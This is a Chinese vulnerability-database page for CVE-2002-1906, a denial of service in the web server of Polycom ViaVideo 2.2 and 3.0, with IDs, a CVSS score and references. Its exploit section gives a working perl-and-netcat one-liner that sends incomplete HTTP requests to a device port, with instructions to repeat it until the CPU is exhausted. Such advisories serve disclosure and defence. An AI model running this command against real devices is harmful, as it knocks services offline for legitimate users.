Polycom ViaVideo服务拒绝漏洞

Polycom ViaVideo服务拒绝漏洞

漏洞ID 1107044 漏洞类型 其他
发布时间 2002-10-15 更新时间 2005-10-20
图片[1]-Polycom ViaVideo服务拒绝漏洞-安全小百科CVE编号 CVE-2002-1906
图片[2]-Polycom ViaVideo服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200212-609
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21939
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-609
|漏洞详情
PolycomViaVideo2.2和3.0版本的web服务器存在漏洞。远程攻击者可以通过发送不完整HTTP请求和保持连接断开导致服务拒绝(CPU消耗)。
|漏洞EXP
source: http://www.securityfocus.com/bid/5962/info

Polycom ViaVideo devices are prone to a denial of service condition upon receipt of numerous incomplete HTTP requests. This may restrict availability of the device for legitimate users.

The device may need to be restarted to regain normal functionality. 

perl -e 'print "GET " . "/" . " HTTP/1.1rn"' | netcat 10.1.3.54 3603 &

Issue the above command four or more times to cause the denial of service condition.
|参考资料

来源:BID
名称:5962
链接:http://www.securityfocus.com/bid/5962
来源:XF
名称:viavideo-inc-request-dos(10360)
链接:http://www.iss.net/security_center/static/10360.php

相关推荐: LPRNG LPRNG_CERTS.SH Local Insecure Temporary File Creation Vulnerability

LPRNG LPRNG_CERTS.SH Local Insecure Temporary File Creation Vulnerability 漏洞ID 1097391 漏洞类型 Design Error 发布时间 2004-12-23 更新时间 2004…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享